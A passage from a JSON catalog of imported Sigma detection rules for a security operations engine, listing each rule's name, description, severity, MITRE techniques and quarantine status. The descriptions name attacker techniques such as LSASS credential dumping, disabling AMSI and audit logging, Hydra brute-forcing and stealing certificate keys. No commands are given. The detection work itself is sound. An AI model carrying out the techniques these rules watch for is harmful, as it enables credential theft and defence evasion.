"path": "detections/sigma-imports/_quarantine/persistence-and-execution-at-scale-via-gpo-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" } }, { "id": "sigmahq-sigma-a8f866e1-bdd4-425e-a27a-37619238d9c7", "type": "detection", "name": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream", "description": "Detects the creation of a hidden file or folder with the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders and files from tooling such as \"explorer.exe\" and \"powershell.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-hidden-directory-creation-via-ntfs-index-allocation-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a8f866e1-bdd4-425e-a27a-37619238d9c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml" } }, { "id": "sigmahq-sigma-a94cdd87-6c54-4678-a6cc-2814ffe5a13d", "type": "detection", "name": "Unix Shell Configuration Modification", "description": "Detect unix shell configuration 
modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unix-shell-configuration-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_unix_shell_configuration_modification.yml" } }, { "id": "sigmahq-sigma-a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "type": "detection", "name": "Suspicious Service DACL Modification Via Set-Service Cmdlet", "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (only available with PowerShell 7) that can be used to hide services or make them unstoppable", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-dacl-modification-via-set-service-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml" } }, { "id": "sigmahq-sigma-a96970af-f126-420d-90e1-d37bf25e50e1", "type": "detection", "name": "Use Short Name Path in Image", "description": "Detects use of a Windows 8.3 short name in the process image path, which could be used as a method to evade detections that match on the Image field", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-short-name-path-in-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a96970af-f126-420d-90e1-d37bf25e50e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml" } }, { "id": "sigmahq-sigma-a9723fcc-881c-424c-8709-fd61442ab3c3", "type": "detection", "name": "Recon Information for Export with PowerShell", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-information-for-export-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9723fcc-881c-424c-8709-fd61442ab3c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" } }, { "id": "sigmahq-sigma-a982fc9c-6333-4ffb-a51d-addb04e8b529", "type": "detection", "name": "Windows Defender Exclusions Added - Registry", "description": "Detects the Setting of Windows Defender Exclusions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusions-added-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" } }, { "id": "sigmahq-sigma-a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "type": "detection", "name": "Potential Attachment Manager Settings Associations Tamper", "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-attachment-manager-settings-associations-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" } }, { "id": "sigmahq-sigma-a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad", "type": "detection", "name": "MMC Loading Script Engines DLLs", "description": "Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt\nto execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1218.014" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc-loading-script-engines-dlls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9c73e8b-3b2d-4c45-8ef2-5f9a9c9998ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_win_mmc_loads_script_engine_dll.yml" } }, { "id": "sigmahq-sigma-a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "type": "detection", "name": "Suspicious Use of CSharp Interactive Console", "description": "Detects the execution of CSharp interactive console by 
PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-use-of-csharp-interactive-console.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml" } }, { "id": "sigmahq-sigma-aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "type": "detection", "name": "Potential Download/Upload Activity Using Type Command", "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-download-upload-activity-using-type-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_type_arbitrary_file_download.yml" } }, { "id": "sigmahq-sigma-aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "type": 
"detection", "name": "Password Dumper Activity on LSASS", "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-dumper-activity-on-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_lsass_dump.yml" } }, { "id": "sigmahq-sigma-aa2efee7-34dd-446e-8a37-40790a66efd7", "type": "detection", "name": "Recon Information for Export with Command Prompt", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-information-for-export-with-command-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa2efee7-34dd-446e-8a37-40790a66efd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_susp_recon.yml" } }, { "id": "sigmahq-sigma-aa35a627-33fb-4d04-a165-d33b4afca3e8", "type": "detection", "name": "Remote LSASS Process Access Through Windows Remote Management", "description": "Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.001", "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/remote-lsass-process-access-through-windows-remote-management.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml" } }, { "id": "sigmahq-sigma-aa37cbb0-da36-42cb-a90f-fdf216fc7467", "type": "detection", "name": "AMSI Disabled via Registry Modification", "description": "Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.\nAnti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.\nAdversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/amsi-disabled-via-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa37cbb0-da36-42cb-a90f-fdf216fc7467", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_amsi_disable.yml" } }, { "id": "sigmahq-sigma-aa3a6f94-890e-4e22-b634-ffdfd54792cc", "type": "detection", "name": "Suspicious Binary In User Directory Spawned From Office Application", "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-binary-in-user-directory-spawned-from-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" } }, { "id": "sigmahq-sigma-aa6f6ea6-0676-40dd-b510-6e46f02d8867", "type": "detection", "name": "Local File Read Using Curl.EXE", "description": "Detects execution of \"curl.exe\" with the \"file://\" protocol handler in order to read local files.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-file-read-using-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa6f6ea6-0676-40dd-b510-6e46f02d8867", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml" } }, { "id": "sigmahq-sigma-aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "type": "detection", "name": "Certificate Exported Via PowerShell - ScriptBlock", "description": "Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. 
Threat actors were seen abusing this to steal private keys from compromised machines.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-exported-via-powershell-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml" } }, { "id": "sigmahq-sigma-aa8e035d-7be4-48d3-a944-102aec04400d", "type": "detection", "name": "Suspicious Extrac32 Execution", "description": "Download or Copy file with Extrac32", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-extrac32-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aa8e035d-7be4-48d3-a944-102aec04400d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" } }, { "id": "sigmahq-sigma-aaafa146-074c-11eb-adc1-0242ac120002", "type": "detection", "name": "HackTool - 
Hydra Password Bruteforce Execution", "description": "Detects command line parameters used by Hydra password guessing hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-hydra-password-bruteforce-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aaafa146-074c-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_hydra.yml" } }, { "id": "sigmahq-sigma-aac2fd97-bcba-491b-ad66-a6edf89c71bf", "type": "detection", "name": "Executable from Webdav", "description": "Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/executable-from-webdav.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_http_executable_download_from_webdav.yml" } }, { "id": "sigmahq-sigma-aac6c4f4-87c7-4961-96ac-c3fd3a42c310", "type": "detection", "name": "Bitbucket Global Permission Changed", "description": "Detects global permissions change activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-global-permission-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aac6c4f4-87c7-4961-96ac-c3fd3a42c310", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml" } }, { "id": "sigmahq-sigma-aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "type": 
"detection", "name": "Suspicious Use of PsLogList", "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1087.001", "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-use-of-psloglist.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml" } }, { "id": "sigmahq-sigma-aaf46cdc-934e-4284-b329-34aa701e3771", "type": "detection", "name": "Uncommon Child Process Of BgInfo.EXE", "description": "Detects uncommon child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-bginfo-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aaf46cdc-934e-4284-b329-34aa701e3771", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-ab37a6ec-6068-432b-a64e-2c7bf95b1d22", "type": "detection", "name": "Scripting/CommandLine Process Spawned Regsvr32", "description": "Detects various command line and scripting engines/processes such as \"PowerShell\", \"Wscript\", \"Cmd\", etc. spawning a \"regsvr32\" instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scripting-commandline-process-spawned-regsvr32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab37a6ec-6068-432b-a64e-2c7bf95b1d22", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml" } }, { "id": "sigmahq-sigma-ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1", "type": "detection", "name": "Important Windows Event Auditing Disabled", "description": "Detects scenarios where system auditing for important events such as \"Process Creation\" or \"Logon\" events is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/important-windows-event-auditing-disabled.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml" } }, { "id": "sigmahq-sigma-ab567429-1dfb-4674-b6d2-979fd2f9d125", "type": "detection", "name": "Internet Explorer DisableFirstRunCustomize Enabled", "description": "Detects changes to the Internet Explorer \"DisableFirstRunCustomize\" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/internet-explorer-disablefirstruncustomize-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab567429-1dfb-4674-b6d2-979fd2f9d125", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml" } }, { "id": "sigmahq-sigma-ab6bffca-beff-4baa-af11-6733f296d57a", "type": "detection", "name": "Potential AD User Enumeration From Non-Machine Account", "description": "Detects read access to a domain user from a non-machine account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ad-user-enumeration-from-non-machine-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab6bffca-beff-4baa-af11-6733f296d57a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_ad_user_enumeration.yml" } }, { "id": "sigmahq-sigma-ab70c354-d9ac-4e11-bbb6-ec8e3b153357", "type": "detection", "name": "Remote Access Tool - Team Viewer Session Started On Windows Host", "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-team-viewer-session-started-on-windows-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab70c354-d9ac-4e11-bbb6-ec8e3b153357", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml" } }, { "id": "sigmahq-sigma-ab871450-37dc-4a3a-997f-6662aa8ae0f1", "type": "detection", "name": "Disable Macro Runtime Scan Scope", "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-macro-runtime-scan-scope.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" } }, { "id": "sigmahq-sigma-ab90dab8-c7da-4010-9193-563528cfa347", "type": "detection", "name": "Potentially Suspicious Self Extraction Directive File Created", "description": "Detects the creation of a binary file with the \".sed\" extension. 
